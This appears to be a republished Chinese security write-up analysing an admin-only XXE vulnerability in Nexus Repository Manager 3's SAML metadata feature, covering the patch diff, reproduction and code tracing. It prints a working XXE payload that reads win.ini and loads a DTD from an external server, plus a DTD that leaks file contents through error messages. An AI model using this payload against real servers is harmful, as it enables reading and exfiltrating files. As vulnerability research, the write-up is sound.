作者:r00t4dm@Cloud-Penetrating Arrow Lab & Longofo@知道创宇404实验室
时间:2020年12月16日

最近Nexus Repository Manager3安全公告更新了一个XXE漏洞,虽然需要管理权限才能利用,并且Nexus Repository Manager3在较高的版本中也会强制更改以前较低版本使用的默认密码admin/admin123,最后漏洞触发也很简单,但是过程还是挺有意思,并且不会受到jdk高版本导致不能带换行的问题,列目录、读文件可以带出任意字符,除了二进制文件外,没有找到能编码的协议。

补丁

diff下最高漏洞版本3.28.1-01和修复版本3.29.0-02:

可以看到在一个SafeXml#configureValidator中做了限制加载外部dtd的操作,可以注意到这个configureValidator是新增的方法而不是在原方法中修复,但是只是个工具类。

漏洞复现

来到后台Saml的功能点:

看到这个大大的XML输入框就知道大概率是有XML操作的。

简单测试下能不能进行dtd请求,如果能的话很可能读取文件也可以:

点击保存就能看到进行了请求。测试了下读文件,可以利用ftp、http等协议带出单行文件,看了下jdk版本在windows是使用的自带的8u252,@r00t4dm在mac上的安装包不会自带jdk,使用的是系统的,那么linux下也是系统的,所以试用的是较低版本的jdk,是可以带换行的。后面看了下返回包,居然把异常返回到了json,那么我们可以通过报错xml将任何文本字符带出了,包括\n#<等文本字符。

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
        <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
        <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/my.dtd">
        %dtd;
        %send;
        ]>
<ANY>xxe</ANY>

dtd:
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM '%file;'>"
>
%all;

看下效果:

其他带#<等字符的文件也都可以。

漏洞分析

既然configureValidator是新增的方法,而且是一个static方法,那么在最新版本中大概率就有其他类调用这个方法了来修复了。在github开源的3.29.0-02代码中搜索configureValidator,没有搜到任何结果,这个地方就很奇怪了,难道是动态隐式调用?但是前面configureValidator是一个新增的方法并且是一个静态方法,感觉不太可能动态隐式调用。因为之前也弄过Nexus的漏洞,他的安装包lib中有许多代码没有在github那个开源的仓库中,所以就反编译了3.29.0-02版本所有的lib包,一搜索configureValidator,果然有调用而且就此一处:

接着又往上搜SamlMetadataTool的调用,都是带有Saml字眼的相关类在调用。所以猜想会有个Saml的功能,去官方文档搜索下:

看到这个描述是不是有点激动呢?猜测就是这个位置了。按照描述去后台配置点,发现并不能使用这个SAML功能,再看文档说的式要Pro版本才能用这个功能,可以去官网申请试用

从上面的发包可以看到处理url为/service/rest/internal/ui/saml,在github开源部分的代码中依然是搜不到的,在反编译的代码中搜索/ui/saml可以找到处理类:

下面是调用栈:

前面调用栈太长就不copy出来了。


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1431/